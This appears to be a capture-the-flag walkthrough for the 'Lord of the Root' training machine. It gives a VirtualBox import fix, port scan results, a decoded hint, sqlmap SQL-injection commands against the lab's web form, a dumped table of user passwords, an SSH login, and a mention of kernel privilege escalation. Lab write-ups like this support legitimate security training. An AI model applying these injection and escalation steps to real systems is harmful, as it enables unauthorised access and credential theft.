Lord of the Root 1.0.1
Description ⤵️
I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP.
This is a boot-to-root machine that will not require any guest interaction.
There are two designed methods for privilege escalation.
- 23/09/2015 == v1.0.1
- 22/09/2015 == v1.0
If you are having issues with VirtualBox, try the following:
- Downloaded LordOfTheRoot_1.0.1.ova (confirmed file hash)
- Downloaded and installed VMWare ovftool.
- Converted the OVA to OVF using ovftool.
- Modified the OVF using a text editor, and did the following:
  - replaced all references to “ElementName” with “Caption”
  - replaced the single reference to “vmware.sata.ahci” with “AHCI”
- Saved the OVF.
- Deleted the .mf (Manifest) file. If you do not, you get an error when importing, saying the SHA does not match for the OVF (I also tried modifying the hash, but no luck).
- Try importing the OVF file, and it should work fine.
Source: https://twitter.com/dooktwit/status/646840273482330112
Let’s find the IP Address first »
IP : 10.0.2.23
Port Scan Results ➡️
OPEN PORTS >
22 SSH
1337 HTTP
Web Enumeration ⤵️
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
Closer!
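How the string above unwraps, as an added example (not code from the original write-up): the hint is only Base64-encoded, twice, and the inner layer is the path that appears in the sqlmap URL further down. The names `peel_base64` and `_try_decode` are assumptions made for this sketch.

```python
import base64
import binascii
from typing import List, Optional

# String shown in the write-up above (copied from the page).
HINT = "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh"


def _try_decode(token: str) -> Optional[str]:
    """Return decoded text if token is strict Base64 of printable ASCII."""
    # Short or misaligned tokens are treated as plain words, not Base64.
    if len(token) < 8 or len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)  # rejects '!', '.', etc.
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def peel_base64(value: str, max_layers: int = 10) -> List[str]:
    """Decode token by token until a pass changes nothing; return each layer."""
    layers = [value]
    for _ in range(max_layers):
        tokens = layers[-1].split()
        decoded = [_try_decode(t) for t in tokens]
        if all(d is None for d in decoded):
            break  # nothing left that looks like Base64
        # Keep plain words (such as "Closer!") next to the decoded tokens.
        layers.append(" ".join(t if d is None else d
                               for t, d in zip(tokens, decoded)))
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(HINT)):
        print(depth, layer)
```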
Sqlmap →
commands →
sqlmap -o -u http://10.0.2.23:1337/978345210/index.php --form --dbs --l
Command →
sqlmap -o -u http://10.0.2.23:1337/978345210/index.php --form --dbms m
+----+------------------+----------+
| id | password | username |
+----+------------------+----------+
| 1 | iwilltakethering | frodo |
| 2 | MyPreciousR00t | smeagol |
| 3 | AndMySword | aragorn |
| 4 | AndMyBow | legolas |
| 5 | AndMyAxe | gimli |
+----+------------------+----------+
Now let's try SSH login →
MyPreciousR00t
Now let's check the kernel version →
I found this on the web →
Let's try it out →
I got it →
Flag.txt →
Summary Notes →
💡 → sqlmap
→ Post-exploitation can be done by exploiting the kernel, or
→ Buffer Overflow